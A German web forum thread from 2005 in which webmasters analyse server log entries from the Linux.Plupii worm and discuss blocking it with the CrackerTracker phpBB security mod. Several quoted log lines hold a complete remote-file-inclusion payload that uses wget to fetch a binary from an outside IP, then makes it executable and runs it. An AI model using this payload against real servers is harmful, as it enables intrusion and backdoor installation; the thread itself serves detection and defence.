Seite 1 von 1
bewusster Hackversuch oder Wurm?
Verfasst: Sa 17.Dez, 2005 19:30
von Dungeonwatcher
'n Abend!
Seit Tagen wird mein Webserver mit solchenen Anfragen bombardiert:
Code: Alles auswählen
"GET /modules/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=h...
"GET /Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://81...
"GET /xmlrpc.php HTTP/1.0" 404 - "" "Mozilla/4.0 (compatible; MSIE 6.0; Windo...
"GET /blog/xmlrpc.php HTTP/1.0" 404 - "" "Mozilla/4.0 (compatible; MSIE 6.0;...
"GET /blog/xmlsrv/xmlrpc.php HTTP/1.0" 404 - "" "Mozilla/4.0 (compatible; MSI...
"GET /blogs/xmlsrv/xmlrpc.php HTTP/1.0" 404 - "" "Mozilla/4.0 (compatible; MS...
"GET /drupal/xmlrpc.php HTTP/1.0" 404 - "" "Mozilla/4.0 (compatible; MSIE 6.0...
"GET /phpgroupware/xmlrpc.php HTTP/1.0" 404 - "" "Mozilla/4.0 (compatible; MS...
"GET /wordpress/xmlrpc.php HTTP/1.0" 404 - "" "Mozilla/4.0 (compatible; MSIE...
"GET /xmlrpc.php HTTP/1.0" 404 - "" "Mozilla/4.0 (compatible; MSIE 6.0; Windo...
"GET /xmlrpc/xmlrpc.php HTTP/1.0" 404 - "" "Mozilla/4.0 (compatible; MSIE 6.0...
"GET /xmlsrv/xmlrpc.php HTTP/1.0" 404 - "" "Mozilla/4.0 (compatible; MSIE 6.0...
Diese kommen von den unterschiedlichsten IP-Adressen. Versucht da jemand bewusst eine Lücke zu finden, oder treibt da ein Wurm sein Unwesen?
Bye/2
Verfasst: Sa 17.Dez, 2005 20:12
von oxpus
Würmer.
Wenn Du den Cracker Tracker eingebaut hast (Version 4.0.1 ist gerade aktuell). brauchst Du Dir keine Gedanken zu machen. Ansonsten: Einbauen!
Verfasst: Sa 17.Dez, 2005 22:02
von Dungeonwatcher
[quote="oxpus - Sa 17.Dez, 2005 20:12";p="50625"]Würmer.[/quote]
Weist du auch welcher sich da gerade vergeblich die Zähne ausbeisst?
Wenn Du den Cracker Tracker eingebaut hast (Version 4.0.1 ist gerade aktuell). brauchst Du Dir keine Gedanken zu machen. Ansonsten: Einbauen!
Upps, 4.0.1 schon? Die 4.0.0 ist hier wenige Minuten nach Veröffentlichung eingebaut gewesen. Da war ich sogar schneller als du.
Verfasst: Sa 17.Dez, 2005 23:31
von cback
Wie gehn die denn weiter? Seltsame Art der Anfrage sieht nach Globals prüfung aus, nur obs geht. Krieg ich vielleicht mal die ganze Zeile zum anschauen? Die Attackform sieht recht neu aus. Brauche aber den ganzen String um den Wurmquellcode zu finden um ggf. die Filter anzupassen.
Verfasst: Sa 17.Dez, 2005 23:58
von Dungeonwatcher
[quote="cback - Sa 17.Dez, 2005 23:31";p="50634"]Krieg ich vielleicht mal die ganze Zeile zum anschauen?[/quote]
Nu freilich doch...
Code: Alles auswählen
"GET /modules/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo| HTTP/1.0" 404 - "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
"GET /Forums/admin/admin_styles.phpadmin_styles.php?phpbb_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo| HTTP/1.0" 404 - "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
"GET /xmlrpc.php HTTP/1.0" 404 - "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
"GET /blog/xmlrpc.php HTTP/1.0" 404 - "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
"GET /blog/xmlsrv/xmlrpc.php HTTP/1.0" 404 - "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
"GET /blogs/xmlsrv/xmlrpc.php HTTP/1.0" 404 - "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
[...]
Verfasst: So 18.Dez, 2005 00:00
von cback
Hatte gerade auf der SourceForge Projektseite für den CrackerTracker ein Feature Request, was mich auf Dein Phenomen hat stoßen lassen:
http://sourceforge.net/tracker/index.ph ... tid=793939
Es sind, wie ich schon rausfinden konnte nun lediglich Tests, ob Dein Server eine Antwort liefert und damit anfällig für eine Lücke ist, die dann wiederum durch einen Schädlichen Wurm ausgenutzt werden kann. Diese Attacken sind also nicht tragisch und nicht gefährlich, sind nur nervig.
Dann werde ich eine kleine Änderung am CTracker Erkennungsengine durchführen und kann damit nicht nur schädliche Würmer, sondern auch alle Arten von diesen "Lage-Checkern" erkennen und blockieren.
PS: Tauchen diese Einträge im Log schon auf? Ich denke von dem was ich alles gefunden hab, dass CrackerTracker Heuristik das schon erkennt:
cmd=cd
cmd= ist zum Beispiel im Baukasten drin, also er schützt schon davor.
Also stehn diese Dinger auch im CrackerTracker Logfile? Meiner Blockt es, wenn ich es bei mir ausprobiere.
Verfasst: So 18.Dez, 2005 00:19
von Dungeonwatcher
[quote="cback - So 18.Dez, 2005 00:00";p="50640"]Es sind, wie ich schon rausfinden konnte nun lediglich Tests, ob Dein Server eine Antwort liefert und damit anfällig für eine Lücke ist, die dann wiederum durch einen Schädlichen Wurm ausgenutzt werden kann. Diese Attacken sind also nicht tragisch und nicht gefährlich, sind nur nervig.[/quote]
Ahja. Zumindest versauen die mir meine Statistik der nichtgefundenen Seiten. ^7
Dann werde ich eine kleine Änderung am CTracker Erkennungsengine durchführen und kann damit nicht nur schädliche Würmer, sondern auch alle Arten von diesen "Lage-Checkern" erkennen und blockieren.
Cool.
PS: Tauchen diese Einträge im Log schon auf? Ich denke von dem was ich alles gefunden hab, dass CrackerTracker Heuristik das schon erkennt:
Im Server.log stehen diese so drinn.
Also stehn diese Dinger auch im CrackerTracker Logfile? Meiner Blockt es, wenn ich es bei mir ausprobiere.
Nein, denn soweit kommt die Anfrage garnicht, da die abgefragten Pfade hier nicht existieren. ^d
Verfasst: So 18.Dez, 2005 01:08
von cback
Achso, ja z.B der XTreme Styles Mod entfernt ja diese Styles Datei, dann kommt es auch nicht am CTracker vorbei weil das Forum ja gar nicht geladen wird. Aber ich habe mich mal schlau gemacht, die Heuristik erkennt schon im aktuellen 4.0.1 Release alle diese Testarten. Häng z.B mal den String an eine andere Datei. admin_users.php zum Beispiel, springt direkt an der CTracker
Kann ich dem Kandidaten auf SourceForge auch gleich mal mitteilen.
Verfasst: So 18.Dez, 2005 11:33
von Titus
[quote="Dungeonwatcher - Sa 17.Dez, 2005 23:58";p="50639"]
Code: Alles auswählen
"GET /modules/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo| HTTP/1.0" 404 - "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
[/quote]
läuft dein Forum unter /modules/
(wohl kaum)
sind das nicht einfach automatische anfragen für/gegen (php)nuke nutzer?
ist der CT eigentlich (php-/post-)nuke tauglich (die währen sicher froh drum
)
mit der .htaccess (hier schon mehrfah gepostet) lässt sich das spektakel wohl auch recht gut blocken der CT ist zumindest von den requests absolut arbeitslos (muss ich immer selber herhalten ob er überhaupt noch funktioniert weil sich nichts tut)
Verfasst: Mo 19.Dez, 2005 14:39
von cback
[quote="Titus - 12.Dezember 2005, 11:33";p="50655"]
ist der CT eigentlich (php-/post-)nuke tauglich (die währen sicher froh drum
)
[/quote]
Die StandAlone Fassung davon ja:
http://www.cback.de/cback_software/standalonect.php
Hat auch neulich jemand für WBB angepasst, der wollte sich auch irgendwann mal an die große Professional machen, damit ich auch im WBB Sektor el Securer numero uno werde.
Verfasst: Mo 19.Dez, 2005 15:06
von oxpus
Das schaffst Du doch locker, Cback
Verfasst: Mo 19.Dez, 2005 16:28
von cback
ich krieg kein WBB2 Forum des is das Ding, das kostet ja Geld, was ich net so hab.
Verfasst: Mo 19.Dez, 2005 17:19
von oxpus
Yepp, ist schon klar.
Verfasst: Mo 19.Dez, 2005 23:13
von Titus
[quote="cback - Mo 19.Dez, 2005 14:39";p="50711"]
Die StandAlone Fassung davon ja:
http://www.cback.de/cback_software/standalonect.php
[/quote]
na ok das ding ist ja keine kunst zu implementieren
(hab ich sogar in nem vB geschafft incl logger und aktuellen definitionen 
), dachte nur da das phpBB vom *nuke ja ähnlich dem original ist gibts da noch ne alternative
(IMO sind die auch nicht die schnellsten bei den updates // seh nur uralt phpBBs wenn ich mal eines in nem nuke zu gesicht bekomme)
Verfasst: Do 22.Dez, 2005 13:39
von Dungeonwatcher
Hi!
Jetzt weiss ich was das ist, ein Würmchen: "
Linux.Plupii is a worm with back door capabilities that spreads by exploiting several Web server-related vulnerabilities.". Genaueres dazu steht
hier
Bye/2
Verfasst: Do 22.Dez, 2005 13:52
von oxpus
Netter Name
Verfasst: Do 22.Dez, 2005 14:19
von Dungeonwatcher
Jou, aber sonst ist er nicht besonders nett:
Symantec @ 07, Nov, 2005 hat geschrieben:Symantec schätzt die Verbreitung von Linux.Plupii bisher als gering ein, er birgt jedoch das Potential, sich schnell zu vermehren - wie die effektiven Schäden auf den betroffenen Systemen ausfallen, hängt im wesentlichen vom "Wohlwollen" des Angreifers ab, der die bereitgestellte Backdoor ausnutzt.
Der Wurm verbreitet sich ohne Zutun der Anwender. Er nutzt dazu drei Sicherheitslücken in Linux-Webserver-Applikationen.
Hat sich der Wurm über diese Sicherheitslücken in einem System installiert, öffnet er eine Hintertür auf UDP-Port 7222 und sendet über diesen Port eine Benachrichtigung an seinen Urheber. Der erhält durch die Hintertür Zugriff auf das befallene System.
Entdeckt ein Virenschutz-Programm Linux.Plupii, besteht daher die Möglichkeit, dass der Angreifer bereits weitere Änderungen am System vorgenommen hat. Symantec empfiehlt daher im Fall einer Entdeckung eine komplette Neuinstallation des Betriebssytems, sofern ein solcher Zugriff nicht mit absoluter Sicherheit ausgeschlossen werden kann.
Und vermehren tut er sich wohl gerade mächtig. Ich bin nämlich nicht der Einzige dem diese Einträge im Server Log aufgefallen sind. In der NG "ger.ct" gibt es mittlerweile auch eine größere Diskussion darüber.
Bye/2
Verfasst: Do 22.Dez, 2005 16:31
von Titus
[quote="Dungeonwatcher - Do 22.Dez, 2005 14:19";p="50890"]In der NG "ger.
ct" gibt es mittlerweile auch eine größere Diskussion darüber.
[/quote]
der CrackTracker hat ne newsgroup
Verfasst: Do 22.Dez, 2005 21:19
von cback
Und ne eigene PC Zeitschrift.
Verfasst: Fr 23.Dez, 2005 17:27
von AmigaLink
